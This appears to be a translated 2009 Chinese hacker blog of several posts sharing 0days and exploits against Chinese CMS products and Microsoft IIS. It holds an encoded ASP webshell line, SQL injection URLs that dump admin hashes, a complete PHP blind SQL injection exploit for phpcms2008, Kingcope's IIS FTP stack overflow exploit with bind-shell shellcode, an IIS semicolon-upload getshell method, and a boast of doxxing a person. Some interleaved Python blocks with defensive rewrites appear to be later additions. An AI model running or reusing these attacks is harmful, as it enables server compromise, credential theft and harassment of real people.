
fuck 中国被黑站点统计系统 (China Defaced Sites Statistics System)

3 Comments | This entry was posted on Sep 28 2009

Ugh, seriously annoyed. In my traffic stats I saw several referrers from http://www.zone-h.com.cn
Opened it and found it's the China Defaced Sites Statistics System (中国被黑站点统计系统), but nothing there seemed to have anything to do with me... After searching my name st0p, the result almost made me spit blood. This site is way too irresponsible, and way too funny..
They posted the one-liner I uploaded to my space via the remote image save bug in my previous post "沸腾新闻系统 v0.45: getting a SHELL". Damn, and they even posted it wrong; they must have filtered out the ';' character...
The original URL was http://www.st0p.org/st0p.asp;jpg, and now it has become http://www.st0p.org/st0p.aspjpg....

The URL is: http://www.zone-h.com.cn/index.php?key=st0p&mode=domain&Submit=+Search+


新云 4.0 latest 0day

83 Comments | This entry was posted on Sep 26 2009

Source: 许诺's blog

Visit the ask directory and register a user.
In the security question field, insert the encoded one-liner: ┼攠數畣整爠煥敵瑳∨≡┩愾
After registering successfully, connect to the default database: ask/data/ask_newasp.asa, password: a

Social engineering finally succeeded

10 Comments | This entry was posted on Sep 25 2009

Hehe, wanted to join TR, and had to answer a question first...
TR boss said: name 9xiao boss's real name and you're in....
After two hours of effort, the social engineering finally succeeded...
Wow, firing blindly, I hit a few innocent bystanders, and even hit the info behind someone's phone number; the phone still had a balance of 60 yuan..
Social engineering really is powerful. Scary..

沸腾新闻系统 v0.45: getting a SHELL

10 Comments | This entry was posted on Sep 25 2009

Author: st0p
Please credit the source when reposting: http://www.st0p.org

Note: the target site's administrator has already been told to patch the hole.

無材 in the group sent over a site. Opening it, it looked a lot like 沸腾新闻系统, but the version said V0.1. I couldn't find that version online; the versions I found were 1.1 and 0.45. I remembered there was an injection in News.asp, tried it, and it did work, but because the version differs, the columns of the news table differ, so the statement is a bit different.

After st0p's attempts, the target site should be 0.45. The following statement successfully returned the admin username and password HASH; I succeeded when I got to 27 columns..

http://st0p.org/News.asp?click=1&shu=20%201%20as%20NewsID,username%20as%20title,3%20as%20updatetime,passwd%20as%20click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin%20%20order%20by%202%20desc%20union%20select%20top%202


See? We got the username xcb and the password c95ca278a74775f8. Then we go to crack the MD5... annoying, not found, can't crack it. Does that mean we can't get into the admin panel?...
Then I looked at the 0.45 code and found the user login check in admin/chkuser.asp. Let's look at the code:

<%
IF not(Request.cookies("KEY")="super" or Request.cookies("KEY")="check" or Request.cookies("KEY")="typemaster" or Request.cookies("KEY")="bigmaster" or Request.cookies("KEY")="smallmaster" or Request.cookies("KEY")="selfreg") THEN
'First check the KEY cookie; if it is not one of the values above, redirect to the login page
response.redirect "login.asp"
response.end
END IF
set urs=server.createobject("adodb.recordset")
sql="select * from admin where username='"&Request.cookies("username")&"'"
'Check whether the username from the cookie is an admin user
urs.open sql,conn,1,3
if urs.bof or urs.eof then
response.redirect "login.asp"
response.end
end if
IF Request.cookies("passwd")<>urs("passwd") THEN
'If the user exists, check whether the passwd cookie equals the user's password HASH; redirect if it differs
response.redirect "login.asp"
response.end
END IF
urs.close
set urs=nothing
%>

Hehe, lucky. Although the password HASH can't be cracked, it can be used for spoofing. See the exploitation process..
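As an added illustration (not code from the original post or from 沸腾新闻系统), the chkuser.asp check above modelled in Python next to a version that trusts only a server-issued session token; the admin table, password and session store are constructed placeholders.

```python
# Added illustration, not code from the original post or from 沸腾新闻系统.
# Models the admin/chkuser.asp check in Python and contrasts it with a check
# that trusts only a server-issued session token. All data is constructed.
import hashlib
import hmac
import secrets

ALLOWED_KEYS = {"super", "check", "typemaster", "bigmaster", "smallmaster", "selfreg"}

# Constructed admin table (the real app stores an MD5-style hash; any digest works here).
ADMIN_TABLE = {"xcb": {"passwd": hashlib.sha256(b"constructed-password").hexdigest()}}


def check_user_vulnerable(cookies, admin_table):
    """Mirror of chkuser.asp: KEY cookie in the allowed set, username present in
    the admin table, and the browser-supplied passwd cookie equal to the stored hash."""
    if cookies.get("KEY") not in ALLOWED_KEYS:
        return False
    row = admin_table.get(cookies.get("username"))
    if row is None:
        return False
    # The client chose this cookie, so whoever knows the stored hash (in the post:
    # read out through the News.asp injection) passes without knowing the password.
    return cookies.get("passwd") == row["passwd"]


SESSIONS = {}  # server-side store: token -> username


def login(username, password, admin_table):
    """Real credential check; on success issue an unguessable session token."""
    row = admin_table.get(username)
    digest = hashlib.sha256(password.encode()).hexdigest()
    if row is None or not hmac.compare_digest(digest, row["passwd"]):
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = username
    return token


def check_user_hardened(cookies):
    """Hardened check: the only cookie that matters is a token this server issued,
    so knowing the password hash is worthless to a client that holds it."""
    token = cookies.get("session")
    return token is not None and token in SESSIONS
```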

An uploader that breaks the Windows 2003 200k limit

2 Comments | This entry was posted on Sep 25 2009

Source: pcsec

Saw TR posting this in the group, noting it down..

Thanks to Netpatch for the submission

Sometimes we need to upload something big, but the W2K3 default upload limit is 200KB. Then we have no choice but to split it into chunks and upload them one at a time. How tiring!
Someone asked why not use the Microsoft.XMLHTTP and Adodb.Stream components and download straight from the server [what if the server can't reach the network? What would you do then?]

So this super uploader came about. In practice it handles files larger than 10M!

No problems found in testing so far! If you hit one, leave a comment!

Please keep the copyright notice when reposting. Thanks for your cooperation!

SU.vbs ----- client
s.asp ----- server

Usage:
cscript su.vbs url local_file

cscript su.vbs http://pcsec.org/s.asp c:\test.exe


Free email addresses with the st0p.org suffix

12 Comments | This entry was posted on Sep 24 2009

Free username@st0p.org mailboxes, limited quantity, usable to log in to Gtalk. If you need one, contact me on QQ: 16739670

DEDECMS novel serialization module 0DAY

72 Comments | This entry was posted on Sep 22 2009

Author: st0p
May be reposted, but please credit the source http://www.st0p.org

Because this hole lives in DEDECMS's novel serialization module, the problem exists whenever the novel serialization module was selected during DEDECMS installation, and on some versions, when conditions allow, you can get a SHELL directly.
st0p has summarized the exploitation conditions:
Condition 1: the server's PHP is configured with magic_quotes_gpc = Off
Condition 2: the novel serialization module was selected when the target DEDECMS was installed

First let's look at DEDECMS 5.1. Its novel channel differs from DEDECMS 5.3.1 and DEDECMS 5.5: its file lives under the member directory, as member/story_books.php, while in DEDECMS 5.3.1 and DEDECMS 5.5 the file is under the book directory, as book/story_books.php.
Since the code inside is similar, we only need to look at one story_books.php.

<?php
......
if(!isset($action)) $action = ''; // check whether $action exists; if not, give it an initial value
if(!isset($catid)) $catid = 0; // check whether $catid exists; if not, give it an initial value
if(!isset($keyword)) $keyword = ""; // check whether $keyword exists; if not, give it an initial value
if(!isset($orderby)) $orderby = 0; // check whether $orderby exists; if not, give it an initial value
......
if($catid!=0) $addquery .= " And (b.bcatid='$catid' Or b.catid='$catid') ";
// when $catid is not 0, $catid goes straight into $addquery with no validation
if($keyword!="") $addquery .= " And (b.bookname like '%$keyword%' Or b.author like '%$keyword%') ";
// when $keyword is not empty, $keyword goes straight into $addquery with no validation
$query = "
   Select b.id,b.catid,b.bookname,b.booktype,b.litpic,b.postnum,b.senddate,b.ischeck, c.id as cid,c.classname From #@__story_books b
   left join #@__story_catalog c on c.id = b.catid where memberid={$cfg_ml->M_ID} and b.id>0 $addquery $orderby
";
// the statement is built
......
?>

See the code above? Heh, catid and keyword are not filtered, which is what causes the injection. Constructing the statement seems a bit troublesome though, so that is outside the scope of this article. Let's try a small example. Do the following test after logging in: just register an account, log in, and then enter the following URL
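An added example (not DEDECMS code) that rebuilds the query shape from story_books.php on SQLite, which stands in for MySQL here, with constructed rows for two members; it shows that with no escaping in play a quote in keyword is parsed as SQL, and what casting catid and binding keyword changes.

```python
# Added example, not DEDECMS code: the query shape from story_books.php rebuilt
# on SQLite (standing in for MySQL) with constructed rows for two members, so
# the effect of an unfiltered keyword is observable.
import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE story_books(id INTEGER, memberid INTEGER, catid INTEGER, bookname TEXT, author TEXT);
INSERT INTO story_books VALUES (1, 7, 3, 'my draft', 'me'), (2, 9, 3, 'private book', 'other');
""")


def list_books_vulnerable(member_id, catid, keyword):
    """Same construction as the PHP above: values pasted straight into the SQL text."""
    addquery = ""
    if catid != 0:
        addquery += f" AND (b.catid='{catid}') "
    if keyword != "":
        addquery += f" AND (b.bookname LIKE '%{keyword}%' OR b.author LIKE '%{keyword}%') "
    sql = f"SELECT b.id, b.memberid FROM story_books b WHERE memberid={member_id} AND b.id>0 {addquery}"
    return con.execute(sql).fetchall()


def list_books_safe(member_id, catid, keyword):
    """Fix that does not depend on magic_quotes_gpc: cast catid to int, bind keyword."""
    catid = int(catid)  # raises ValueError instead of accepting a SQL fragment
    params = [int(member_id)]
    addquery = ""
    if catid != 0:
        addquery += " AND (b.catid=?) "
        params.append(catid)
    if keyword != "":
        addquery += " AND (b.bookname LIKE ? OR b.author LIKE ?) "
        params += [f"%{keyword}%", f"%{keyword}%"]
    sql = f"SELECT b.id, b.memberid FROM story_books b WHERE memberid=? AND b.id>0 {addquery}"
    return con.execute(sql, params).fetchall()


def quote_reaches_parser(keyword):
    """True when a single quote in keyword is read as SQL syntax rather than data,
    which is what magic_quotes_gpc = Off leaves possible in the PHP above."""
    try:
        list_books_vulnerable(7, 0, keyword)
        return False
    except sqlite3.OperationalError:
        return True
```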

phpcms2008 latest 0day & Exp

1 Comment | This entry was posted on Sep 19 2009

Source: My5t3ry

The vulnerability lies in lines 17-34 of yp/job.php; the urldecode function is to blame. The code is as follows:

switch($action)
{
case 'list':
$catid = intval($catid);
$head['keywords'] .= '职位列表';
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$templateid = 'job_list';
if($inputtime)
$time = time() - 3600*$inputtime*24;
else $time = 0;
if($time < 0 )$time = 0;
$where = "j.updatetime >= '{$time}' ";
$genre = urldecode($genre);
if($station)$where .= "AND j.station = '{$station}' ";
if($genre)$where .= "AND c.genre = '{$genre}' ";
if(!trim($where))$where = '1';
break;
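Added example (not phpcms code): the request path modelled in Python to show why the extra urldecode matters. It assumes the web server percent-decodes the query string once and that magic_quotes_gpc (PHP addslashes) runs before job.php, which is the setting the %2527 in the exploit below counts on.

```python
# Added example, not phpcms code: models what $genre holds at each stage of the
# job.php request path. Assumes the web server percent-decodes the query string
# once and that magic_quotes_gpc (PHP addslashes) runs before job.php.
import re
import urllib.parse


def addslashes(value):
    """PHP addslashes(): what magic_quotes_gpc applied to every request value."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def genre_in_sql(raw_query_value, magic_quotes=True, second_decode=True):
    """Return the text that ends up between the quotes in "c.genre = '...'".

    second_decode=True reproduces the $genre = urldecode($genre) line of job.php;
    False is the fix: never decode again after the input has already been escaped."""
    genre = urllib.parse.unquote(raw_query_value)   # the server's single decode
    if magic_quotes:
        genre = addslashes(genre)                   # escaping happens here ...
    if second_decode:
        genre = urllib.parse.unquote(genre)         # ... and is undone here
    return genre


def where_clause(raw_query_value, **kwargs):
    """The string job.php appends to $where for a non-empty genre."""
    return f"AND c.genre = '{genre_in_sql(raw_query_value, **kwargs)}' "


def unescaped_quotes(value):
    """Defender check: single quotes in the interpolated value that no backslash protects."""
    return len(re.findall(r"(?<!\\)'", value))
```

A single-encoded %27 is escaped to \' and stays harmless, while %2527 survives addslashes as %27 and only becomes a bare quote in the second decode; with magic_quotes_gpc off, even %27 reaches the SQL unescaped.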

exp:

<?
 
if ($argc != 4)
usage ();
 
$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix="phpcms_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;
 
 
function usage ()
{
global $argv;
echo
"\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site  : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." <hostname> <path> <userid>".
"\n[+] Ex.   : php ".$argv[0]." localhost /yp 1".
"\n\n";
exit ();
}
 
function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);
 
$request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
 
fputs ($fp, $request);
 
while (!feof ($fp))
$reply .= fgets ($fp, 1024);
 
fclose ($fp);
return $reply;
}
 
function exploit ($hostname, $path, $uid, $fld, $chr, $pos)
{
global $prefix;
 
$chr = ord ($chr);
 
$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";
 
$query = str_replace (" ", "%20", $query);
 
$query = str_replace ("'", "%2527", $query);
 
$outcode = request ($hostname, $path, $query);
 
preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);
 
if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}
 
$query = "x%2527";
 
$outcode = request ($hostname, $path, $query);
 
preg_match('/FROM `(.+)yp_job/ie',$outcode,$match);
 
$prefix=$match[1];
 
//function lengthcolumns ()
//{
echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";
 
if ($match[1]) { 
 
echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n";
}
 
else {
die(" Exploit failed...");
}
 
echo "[~]trying to get username length...\n";
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";
 
$query = str_replace (" ", "%20", $query);
 
$query = str_replace ("'", "%2527", $query);
 
$outcode = request ($hostname, $path, $query);
 
$i++;
 
preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);
//echo $outcode;
if ($i>20) {die(" Exploit failed...");}  
 
if (strlen (trim ($x [1])) != 0) {
$exit=1;
}else{
$exit=0;
}
}
 
$length=$i-1;
echo "[+]length -> ".$length;
 
//    return $length;
//}
 
echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";
 
while ($pos <= $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
 
if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
 
$pos = 9;
 
echo "\n[+]password(md5) -> ";
 
while ($pos <= 24)
{
$key = "abcdef0123456789";
if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
 
echo "\n[+]Done!";
echo "\n\n--------------------------------------------------------------------------------";
 
?>

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

16 Comments | This entry was posted on Sep 19 2009
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
 
# http://www.offensive-security.com/0day/msftp.pl.txt
 
use IO::Socket; 
$|=1; 
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
 
$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
 
 
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; 
if ($#ARGV ne 1) { 
print "usage: iiz5.pl <target> <your local ip>\n"; 
exit(0); 
} 
srand(time()); 
$port = int(rand(31337-1022)) + 1025; 
$locip = $ARGV[1]; 
$locip =~ s/\./,/gi; 
if (fork()) { 
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '21', 
                              Proto    => 'tcp'); 
$patch = "\x7E\xF1\xFA\x7F";
# $retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k SP4 platforms 
$retaddr = "\x7B\x30\xE4\x77"; # JMP ESP univ on 2 win2k SP4 + Rollup + Fully Patched
 
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); 
# top address of stack frame where shellcode resides, is hardcoded inside this block 
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" 
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; 
 
# attack buffer 
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. 
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. 
   "HHHHIIII". 
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; 
$x = <$sock>; 
print $x;                             
print $sock "USER anonimoos\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shell\r\n";
$x = <$sock>; 
print $x; 
print $sock "USER anonimoos\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shell\r\n";
$x = <$sock>; 
print $x; 
 
print $sock "USER anonymous\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PASS anonymous\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "MKD w00t$port\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>;
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "CWD w00t$port\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "MKD CCC". "$c\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; 
$x = <$sock>; 
print $x; 
# TRIGGER 
print $sock "NLST $c*/../C*/\r\n"; 
$x = <$sock>; 
print $x; 
while (1) {} 
} else { 
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); 
die "Could not create socket: $!\n" unless $servsock; 
my $new_sock = $servsock->accept(); 
while(<$new_sock>) { 
print $_; 
} 
close($servsock); 
} 
#Cheerio, 
# 
#Kingcope

Code: http://www.offensive-security.com/0day/msftp.pl.txt

Exploitation tutorial: http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/microsoft-ftp-server-remote-exploit_controller.swf

桃源网盘 Getshell hole

1 Comment | This entry was posted on Sep 19 2009

Source: 普瑞斯特

Affected version: latest
Authors: 银色上帝 静流 上帝之爱
银色上帝, 静流 and I came across this program during a pentest, studied it a bit, and found that you can Getshell it directly. Strictly speaking, it is still that IIS hole being used.
Briefly, the method: by default there is a test account whose username and password are both guest (check whether the admin has disabled it).
After logging in, upload a shell that uses the IIS parsing vulnerability.
Unfortunately we didn't know the path. We got hold of a server by other means and compared; its path is:
www.test.com/XX/ID/1.asp;1.jpg
xx = see the explanation below
ID = your account
Unfortunately we found that this XX differs on many installs. What to do?
Later we found that submitting the following request directly reveals the XX directory name:

http://test/show.aspx?type=1&filepath=http://test/

A couple more notes:
1. Sometimes the default guest account is disabled, and you need to register and wait for admin approval
2. Don't rename the file after uploading. For example, if you uploaded 1.jpg and then want to rename it to 1.asp;1.jpg, that won't work, because when a file is renamed after upload, it eats the ";" character
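As an added example (not from 桃源网盘 or the post's authors), a server-side upload-name check that accounts for IIS 6 stopping at the first ';' in a path segment, which is what makes a stored name like 1.asp;1.jpg run as ASP; the extension lists are assumptions for illustration, not taken from the application.

```python
# Added example, not from 桃源网盘 or the post's authors: a server-side upload
# name check that accounts for IIS 6 stopping at the first ';' in a path segment,
# which is what makes a stored name like 1.asp;1.jpg run as ASP. The extension
# lists are assumptions for illustration, not taken from the application.
import re

SCRIPT_EXTENSIONS = {"asp", "asa", "aspx", "cer", "cdx"}
IMAGE_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}


def iis6_effective_name(name):
    """The part of the name IIS 6 actually maps to a handler: everything before ';'."""
    return name.split(";", 1)[0]


def iis6_effective_extension(name):
    """Extension IIS 6 acts on, e.g. 'asp' for '1.asp;1.jpg'."""
    effective = iis6_effective_name(name)
    return effective.rsplit(".", 1)[1].lower() if "." in effective else ""


def is_safe_upload_name(name):
    """Accept only <letters/digits>.<image extension>: no ';', no second dot and no
    script extension anywhere, so neither the upload nor a later rename can
    produce a name that IIS 6 reinterprets."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+", name):
        return False
    ext = name.rsplit(".", 1)[1].lower()
    return ext in IMAGE_EXTENSIONS and iis6_effective_extension(name) not in SCRIPT_EXTENSIONS
```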